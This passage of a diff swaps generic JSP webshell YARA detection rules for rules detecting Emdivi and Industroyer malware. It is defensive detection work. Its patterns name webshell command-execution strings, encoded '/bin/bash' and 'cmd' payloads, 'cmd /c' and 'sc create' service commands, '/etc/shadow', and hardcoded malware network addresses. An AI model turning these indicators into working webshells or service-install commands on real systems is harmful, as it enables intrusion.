 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
-		hash = "bf0ff88cbb72c719a291c722ae3115b91748d5c4920afe7a00a0d921d562e188"
-		logic_hash = "386aeb3745c5dd815f00bbc941450a2c3f1ddfc2956c67ecd5bee9318b1756ef"
-		score = 75
-		quality = 0
+		logic_hash = "c40306d646c5bf8c3aff1bc697b81997b4d635ccf237775e2bea96b89f7fa001"
+		score = 80
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "9a351885bf5f6fec466f30021088504d96e9db10309622ed198184294717add1"
+		hash2 = "a5be7cb1f37030c9f9211c71e0fbe01dae19ff0e6560c5aab393621f18a7d012"
+		hash3 = "9183abb9b639699cd2ad28d375febe1f34c14679b7638d1a79edb49d920524a4"
 
 	strings:
-		$ws_exec = "invoke" fullword wide ascii
-		$ws_class = "Class" fullword wide ascii
-		$fp1 = "SOAPConnection"
-		$fp2 = "/CORBA/"
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
-		$cj_encoded1 = "\"java.util.Base64$Decoder\"" ascii wide
+		$s1 = "%TEMP%\\IELogs\\" ascii
+		$s2 = "MSPUB.EXE" fullword ascii
+		$s3 = "%temp%\\" ascii
+		$s4 = "\\NOTEPAD.EXE" ascii
+		$s5 = "%4d-%02d-%02d %02d:%02d:%02d " fullword ascii
+		$s6 = "INTERNET_OPEN_TYPE_PRECONFIG" fullword ascii
+		$s7 = "%4d%02d%02d%02d%02d%02d" fullword ascii
 
 	condition:
-		all of ( $ws_* ) and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and not any of ( $fp* ) and ( filesize < 10KB and ( any of ( $input* ) and any of ( $req* ) ) or ( filesize < 30KB and any of ( $cj_encoded* ) and math.entropy ( 500 , filesize -500 ) >= 5.5 and math.mean ( 500 , filesize -500 ) > 80 and math.deviation ( 500 , filesize -500 , 89.0 ) < 23 ) )
+		uint16( 0 ) == 0x5a4d and filesize < 1300KB and 6 of them
 }
+rule SIGNATURE_BASE_MAL_Emdivi_Gen3 : FILE
+{
+	meta:
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c3d712ae-3f8e-578c-81cd-fd3e48213875"
+		date = "2015-08-20"
+		modified = "2023-01-06"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L87-L114"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
+		logic_hash = "ff89a0855481d723f23e0c00f6b6eaf912e6df3a7e9ebe4ff1e6ccf2b02f0888"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		super_rule = 1
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
 
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Classloader : FILE
+	strings:
+		$x1 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727.42)" fullword ascii
+		$s2 = "\\Mozilla\\Firefox\\Profiles\\" ascii
+		$s4 = "\\auto.cfg" ascii
+		$s5 = "/ncsi.txt" fullword ascii
+		$s6 = "/en-us/default.aspx" fullword ascii
+		$s7 = "cmd /c" fullword ascii
+		$s9 = "APPDATA" fullword ascii
+
+	condition:
+		uint16( 0 ) == 0x5a4d and filesize < 850KB and ( ( $x1 and 1 of ( $s* ) ) or ( 4 of ( $s* ) ) )
+}
+rule SIGNATURE_BASE_Emdivi_Gen4 : FILE
 {
 	meta:
-		description = "Generic JSP webshell which uses classloader to execute user input"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "037e6b24-9faf-569b-bb52-dbe671ab2e87"
-		date = "2021-01-07"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6072-L6149"
+		description = "Detects Emdivi Malware"
+		author = "Florian Roth (Nextron Systems) @Cyber0ps"
+		id = "02629873-a797-51ff-83fc-af499cafa1e8"
+		date = "2015-08-20"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_bluetermite_emdivi.yar#L116-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6b546e78cc7821b63192bb8e087c133e8702a377d17baaeb64b13f0dd61e2347"
-		hash = "f3a7e28e1c38fa5d37811bdda1d6b0893ab876023d3bd696747a35c04141dcf0"
-		hash = "8ea2a25344e6094fa82dfc097bbec5f1675f6058f2b7560deb4390bcbce5a0e7"
-		hash = "b9ea1e9f91c70160ee29151aa35f23c236d220c72709b2b75123e6fa1da5c86c"
-		hash = "80211c97f5b5cd6c3ab23ae51003fd73409d273727ba502d052f6c2bd07046d6"
-		hash = "8e544a5f0c242d1f7be503e045738369405d39731fcd553a38b568e0889af1f2"
-		logic_hash = "109c0063f4e8db6172fd872b3b93d4f069234f28bbf033fbd2c5f135051df77e"
-		score = 75
-		quality = 0
+		logic_hash = "9c1645023ceefdb849cf4b0e60de8c608bfd5e15d3aac6d16d68a36140a8ebed"
+		score = 80
+		quality = 79
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		super_rule = 1
+		hash1 = "008f4f14cf64dc9d323b6cb5942da4a99979c4c7d750ec1228d8c8285883771e"
+		hash2 = "17e646ca2558a65ffe7aa185ba75d5c3a573c041b897355c2721e9a8ca5fee24"
+		hash3 = "3553c136b4eba70eec5d80abe44bd7c7c33ab1b65de617dbb7be5025c9cf01f1"
+		hash4 = "6a331c4e654dd8ddaa2c69d260aa5f4f76f243df8b5019d62d4db5ae5c965662"
+		hash5 = "90d07ea2bb80ed52b007f57d0d9a79430cd50174825c43d5746a16ee4f94ea86"
+		hash6 = "a94bf485cebeda8e4b74bbe2c0a0567903a13c36b9bf60fab484a9b55207fe0d"
 
 	strings:
-		$exec = "extends ClassLoader" wide ascii
-		$class = "defineClass" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = ".http_port\", " fullword wide
+		$s2 = "UserAgent: " fullword ascii
+		$s3 = "AUTH FAILED" fullword ascii
+		$s4 = "INVALID FILE PATH" fullword ascii
+		$s5 = ".autoconfig_url\", \"" fullword wide
+		$s6 = "FAILED TO WRITE FILE" fullword ascii
+		$s7 = ".proxy" fullword wide
+		$s8 = "AuthType: " fullword ascii
+		$s9 = ".no_proxies_on\", \"" fullword wide
 
 	condition:
-		(( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $exec and $class ) and ( filesize < 10KB or ( filesize < 50KB and ( math.entropy ( 500 , filesize -500 ) <= 1 or math.entropy ( 500 , filesize -500 ) >= 7.7 ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 853KB and all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Generic_Encoded_Shell : FILE
+rule SIGNATURE_BASE_Industroyer_Malware_1 : FILE
 {
 	meta:
-		description = "Generic JSP webshell which contains cmd or /bin/bash encoded in ascii ord"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "359949d7-1793-5e13-9fdc-fe995ae12117"
-		date = "2021-01-07"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6151-L6177"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f5ab571c-03a7-538a-ada1-0930d15af5cf"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L12-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3eecc354390d60878afaa67a20b0802ce5805f3a9bb34e74dd8c363e3ca0ea5c"
-		hash = "f6c2112e3a25ec610b517ff481675b2ce893cb9f"
-		hash = "62e6c6065b5ca45819c1fc049518c81d7d165744"
-		logic_hash = "74f45478e5bd7bb300e4ec493c2d3ef9a26340a141c3512a722618b3a3731500"
+		logic_hash = "276b7abdf43b62c3943a8dc362e1c68b23cc505d288e4395a6ac3cb4795371f2"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910"
+		hash2 = "018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81"
 
 	strings:
-		$sj0 = /\{ ?47, 98, 105, 110, 47, 98, 97, 115, 104/ wide ascii
-		$sj1 = /\{ ?99, 109, 100}/ wide ascii
-		$sj2 = /\{ ?99, 109, 100, 46, 101, 120, 101/ wide ascii
-		$sj3 = /\{ ?47, 98, 105, 110, 47, 98, 97/ wide ascii
-		$sj4 = /\{ ?106, 97, 118, 97, 46, 108, 97, 110/ wide ascii
-		$sj5 = /\{ ?101, 120, 101, 99 }/ wide ascii
-		$sj6 = /\{ ?103, 101, 116, 82, 117, 110/ wide ascii
+		$s1 = "haslo.exe" fullword ascii
+		$s2 = "SYSTEM\\CurrentControlSet\\Services\\%ls" fullword wide
+		$s3 = "SYS_BASCON.COM" fullword wide
+		$s4 = "*.pcmt" fullword wide
+		$s5 = "*.pcmi" fullword wide
+		$x1 = { 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 73
+         00 5C 00 25 00 6C 00 73 00 00 00 49 00 6D 00 61
+         00 67 00 65 00 50 00 61 00 74 00 68 00 00 00 43
+         00 3A 00 5C 00 00 00 44 00 3A 00 5C 00 00 00 45
+         00 3A 00 5C 00 00 00 }
+		$x2 = "haslo.dat\x00Crash"
 
 	condition:
-		filesize < 300KB and any of ( $sj* )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of ( $x* ) or 2 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Netspy : FILE
+rule SIGNATURE_BASE_Industroyer_Malware_2 : FILE
 {
 	meta:
-		description = "JSP netspy webshell"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "41f5c171-878d-579f-811d-91d74f7e3e24"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6179-L6245"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0561a7bb-3b6c-5caf-9131-04924cee1e0f"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L39-L77"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "94d1aaabde8ff9b4b8f394dc68caebf981c86587"
-		hash = "3870b31f26975a7cb424eab6521fc9bffc2af580"
-		logic_hash = "65432e42ad2626b62b1d1a6298c301513c2fb03d89193a77b053069cebcb45e9"
+		logic_hash = "cda3e21c130acd76785905364416b3e8803e866dd93529da57ec980e7af081b7"
 		score = 75
-		quality = 1
+		quality = 83
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "3e3ab9674142dec46ce389e9e759b6484e847f5c1e1fc682fc638fc837c13571"
+		hash2 = "37d54e3d5e8b838f366b9c202f75fa264611a12444e62ae759c31a0d041aa6e4"
+		hash3 = "ecaf150e087ddff0ec6463c92f7f6cca23cc4fd30fe34c10b3cb7c2a6d135c77"
+		hash1 = "6d707e647427f1ff4a7a9420188a8831f433ad8c5325dc8b8cc6fc5e7f1f6f47"
 
 	strings:
-		$scan1 = "scan" nocase wide ascii
-		$scan2 = "port" nocase wide ascii
-		$scan3 = "web" fullword nocase wide ascii
-		$scan4 = "proxy" fullword nocase wide ascii
-		$scan5 = "http" fullword nocase wide ascii
-		$scan6 = "https" fullword nocase wide ascii
-		$write1 = "os.write" fullword wide ascii
-		$write2 = "FileOutputStream" fullword wide ascii
-		$write3 = "PrintWriter" fullword wide ascii
-		$http = "java.net.HttpURLConnection" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$x1 = "sc create %ls type= own start= auto error= ignore binpath= \"%ls\" displayname= \"%ls\"" fullword wide
+		$x2 = "10.15.1.69:3128" fullword wide
+		$s1 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" fullword wide
+		$s2 = "/c sc stop %s" fullword wide
+		$s3 = "sc start %ls" fullword wide
+		$s4 = "93.115.27.57" fullword wide
+		$s5 = "5.39.218.152" fullword wide
+		$s6 = "tierexe" fullword wide
+		$s7 = "comsys" fullword wide
+		$s8 = "195.16.88.6" fullword wide
+		$s9 = "TieringService" fullword wide
+		$a1 = "TEMP\x00\x00DEF" fullword wide
+		$a2 = "TEMP\x00\x00DEF-C" fullword wide
+		$a3 = "TEMP\x00\x00DEF-WS" fullword wide
+		$a4 = "TEMP\x00\x00DEF-EP" fullword wide
+		$a5 = "TEMP\x00\x00DC-2-TEMP" fullword wide
+		$a6 = "TEMP\x00\x00DC-2" fullword wide
+		$a7 = "TEMP\x00\x00CES-McA-TEMP" fullword wide
+		$a8 = "TEMP\x00\x00SRV_WSUS" fullword wide
+		$a9 = "TEMP\x00\x00SRV_DC-2" fullword wide
+		$a10 = "TEMP\x00\x00SCE-WSUS01" fullword wide
 
 	condition:
-		filesize < 30KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and 4 of ( $scan* ) and 1 of ( $write* ) and $http
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of ( $x* ) or 3 of them or 1 of ( $a* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_By_String : FILE
+rule SIGNATURE_BASE_Industroyer_Portscan_3 : FILE
 {
 	meta:
-		description = "JSP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions."
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "8d64e40b-5583-5887-afe1-b926d9880913"
-		date = "2021-01-09"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6247-L6344"
+		description = "Detects Industroyer related custom port scaner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f6675466-d469-562b-9fb6-7b72bce8a726"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L79-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e9060aa2caf96be49e3b6f490d08b8a996c4b084"
-		hash = "4c2464503237beba54f66f4a099e7e75028707aa"
-		hash = "06b42d4707e7326aff402ecbb585884863c6351a"
-		hash = "dada47c052ec7fcf11d5cfb25693bc300d3df87de182a254f9b66c7c2c63bf2e"
-		hash = "f9f6c696c1f90df6421cd9878a1dec51a62e91b4b4f7eac4920399cb39bc3139"
-		hash = "f1d8360dc92544cce301949e23aad6eb49049bacf9b7f54c24f89f7f02d214bb"
-		hash = "1d1f26b1925a9d0caca3fdd8116629bbcf69f37f751a532b7096a1e37f4f0076"
-		hash = "850f998753fde301d7c688b4eca784a045130039512cf51292fcb678187c560b"
-		logic_hash = "794013918e7dbd48d658bb9ec0c7d458905d7263320d89b17d2b144e53f9258b"
+		logic_hash = "539a420989c178b3fa26e313d23e9f9c6804aa6dbd2d94f463ae924d46ac2851"
 		score = 75
-		quality = 19
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "893e4cca7fe58191d2f6722b383b5e8009d3885b5913dcd2e3577e5a763cdb3f"
 
 	strings:
-		$jstring1 = "<title>Boot Shell</title>" wide ascii
-		$jstring2 = "String oraPWD=\"" wide ascii
-		$jstring3 = "Owned by Chinese Hackers!" wide ascii
-		$jstring4 = "AntSword JSP" wide ascii
-		$jstring5 = "JSP Webshell</" wide ascii
-		$jstring6 = "motoME722remind2012" wide ascii
-		$jstring7 = "EC(getFromBase64(toStringHex(request.getParameter(\"password" wide ascii
-		$jstring8 = "http://jmmm.com/web/index.jsp" wide ascii
-		$jstring9 = "list.jsp = Directory & File View" wide ascii
-		$jstring10 = "jdbcRowSet.setDataSourceName(request.getParameter(" wide ascii
-		$jstring11 = "Mr.Un1k0d3r RingZer0 Team" wide ascii
-		$jstring12 = "MiniWebCmdShell" fullword wide ascii
-		$jstring13 = "pwnshell.jsp" fullword wide ascii
-		$jstring14 = "session set &lt;key&gt; &lt;value&gt; [class]<br>" wide ascii
-		$jstring15 = "Runtime.getRuntime().exec(request.getParameter(" nocase wide ascii
-		$jstring16 = "GIF98a<%@page" wide ascii
-		$jstring17 = "Tas9er" fullword wide ascii
-		$jstring18 = "uu0028\\u" wide ascii
-		$jstring19 = "uu0065\\u" wide ascii
-		$jstring20 = "uu0073\\u" wide ascii
-		$jstring21 = /\\uuu{0,50}00/ wide ascii
-		$jstring22 = /[\w\.]\\u(FFFB|FEFF|FFF9|FFFA|200C|202E|202D)[\w\.]/ wide ascii
-		$jstring23 = "\"e45e329feb5d925b\"" wide ascii
-		$jstring24 = "u<![CDATA[n" wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
+		$s1 = "!ZBfamily" fullword ascii
+		$s2 = ":g/outddomo;" fullword ascii
+		$s3 = "GHIJKLMNOTST" fullword ascii
+		$d1 = "Error params Arguments!!!" fullword wide
+		$d2 = "^(.+?.exe).*\\s+-ip\\s*=\\s*(.+)\\s+-ports\\s*=\\s*(.+)$" fullword wide
+		$d3 = "Exhample:App.exe -ip= 127.0.0.1-100," fullword wide
+		$d4 = "Error IP Range %ls - %ls" fullword wide
+		$d5 = "Can't closesocket." fullword wide
 
 	condition:
-		not ( uint16( 0 ) == 0x5a4d or $dex at 0 or $pack at 0 or uint16( 0 ) == 0x4b50 ) and ( ( filesize < 100KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and any of ( $jstring* ) ) or ( filesize < 500KB and ( #jstring21 > 20 or $jstring18 or $jstring19 or $jstring20 ) ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of ( $s* ) or 2 of ( $d* ) )
 }
-rule SIGNATURE_BASE_WEBSHELL_JSP_Input_Upload_Write : FILE
+rule SIGNATURE_BASE_Industroyer_Portscan_3_Output
 {
 	meta:
-		description = "JSP uploader which gets input, writes files and contains \"upload\""
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bbf26edd-88b7-5ec5-a16e-d96a086dcd19"
-		date = "2021-01-24"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6346-L6406"
+		description = "Detects Industroyer related custom port scaner output file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4469f056-674c-5a44-84a5-12a65b8586d5"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L102-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ef98ca135dfb9dcdd2f730b18e883adf50c4ab82"
-		hash = "583231786bc1d0ecca7d8d2b083804736a3f0a32"
-		hash = "19eca79163259d80375ebebbc440b9545163e6a3"
-		logic_hash = "33b08a6118134819ec72a2eab0daf723c25c8869e0fa8a83f690b93e2667d15c"
+		logic_hash = "6a2fc7b66b1e93f523e08e12ba420d261bae198918bb09eac1a7cdecc04a6737"
 		score = 75
-		quality = 46
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$upload = "upload" nocase wide ascii
-		$write1 = "os.write" fullword wide ascii
-		$write2 = "FileOutputStream" fullword wide ascii
-		$cjsp_short1 = "<%" ascii wide
-		$cjsp_short2 = "%>" wide ascii
-		$cjsp_long1 = "<jsp:" ascii wide
-		$cjsp_long2 = /language=[\"']java[\"\']/ ascii wide
-		$cjsp_long3 = "/jstl/core" ascii wide
-		$cjsp_long4 = "<%@p" nocase ascii wide
-		$cjsp_long5 = "<%@ " nocase ascii wide
-		$cjsp_long6 = "<% " ascii wide
-		$cjsp_long7 = "< %" ascii wide
-		$input1 = "getParameter" fullword ascii wide
-		$input2 = "getHeaders" fullword ascii wide
-		$input3 = "getInputStream" fullword ascii wide
-		$input4 = "getReader" fullword ascii wide
-		$req1 = "request" fullword ascii wide
-		$req2 = "HttpServletRequest" fullword ascii wide
-		$req3 = "getRequest" fullword ascii wide
+		$s1 = "WSA library load complite." fullword ascii
+		$s2 = "Connection refused" fullword ascii
 
 	condition:
-		filesize < 10KB and ( $cjsp_short1 at 0 or any of ( $cjsp_long* ) or ( $cjsp_short1 and $cjsp_short2 in ( filesize -100 .. filesize ) ) or ( $cjsp_short2 and ( $cjsp_short1 in ( 0 .. 1000 ) or $cjsp_short1 in ( filesize -1000 .. filesize ) ) ) ) and ( any of ( $input* ) and any of ( $req* ) ) and $upload and 1 of ( $write* )
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Generic_OS_Strings : FILE
+rule SIGNATURE_BASE_Industroyer_Malware_4 : FILE
 {
 	meta:
-		description = "typical webshell strings"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ea85e415-4774-58ac-b063-0f5eb535ec49"
-		date = "2021-01-12"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L6408-L6577"
+		description = "Detects Industroyer related malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f197d2a5-eecb-51ed-b991-7643efb3f749"
+		date = "2017-06-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/x81cSy"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_industroyer.yar#L117-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d5bfe40283a28917fcda0cefd2af301f9a7ecdad"
-		hash = "fd45a72bda0a38d5ad81371d68d206035cb71a14"
-		hash = "b4544b119f919d8cbf40ca2c4a7ab5c1a4da73a3"
-		hash = "569259aafe06ba3cef9e775ee6d142fed6edff5f"
-		hash = "48909d9f4332840b4e04b86f9723d7427e33ac67"
-		hash = "0353ae68b12b8f6b74794d3273967b530d0d526f"
-		logic_hash = "10b956cac601c97d1483d35a7730d7178c4175800b4e4c9ed62ad583d3cac3d7"
-		score = 50
-		quality = -98
+		logic_hash = "cb850445eaf3e1a6c9a9d6c453ed0f6729a95a671a01ce8fbaddf15599e4f2ba"
+		score = 75
+		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
+		hash1 = "21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561"
 
 	strings:
-		$fp1 = "http://evil.com/" wide ascii
-		$fp2 = "denormalize('/etc/shadow" wide ascii
-		$fp3 = "vim.org>"
-		$tagasp_short1 = /<%[^"]/ wide ascii
-		$tagasp_short2 = "%>" wide ascii
-		$tagasp_classid1 = "72C24DD5-D70A-438B-8A42-98424B88AFB8" nocase wide ascii
-		$tagasp_classid2 = "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid3 = "093FF999-1EA0-4079-9525-9614C3504B74" nocase wide ascii
-		$tagasp_classid4 = "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B" nocase wide ascii
-		$tagasp_classid5 = "0D43FE01-F093-11CF-8940-00A0C9054228" nocase wide ascii
-		$tagasp_long10 = "<%@ " wide ascii
-		$tagasp_long11 = /<% \w/ nocase wide ascii
-		$tagasp_long12 = "<%ex" nocase wide ascii
-		$tagasp_long13 = "<%ev" nocase wide ascii
-		$tagasp_long20 = /<(%|script|msxsl:script).{0,60}language="?(vb|jscript|c#)/ nocase wide ascii
-		$tagasp_long32 = /<script\s{1,30}runat=/ wide ascii
-		$tagasp_long33 = /<SCRIPT\s{1,30}RUNAT=/ wide ascii
-		$php1 = "<?php"
-		$php2 = "<?="
-		$jsp1 = "=\"java." wide ascii
-		$jsp2 = "=\"javax." wide ascii
-		$jsp3 = "java.lang." wide ascii
-		$jsp4 = "public" fullword wide ascii
-		$jsp5 = "throws" fullword wide ascii
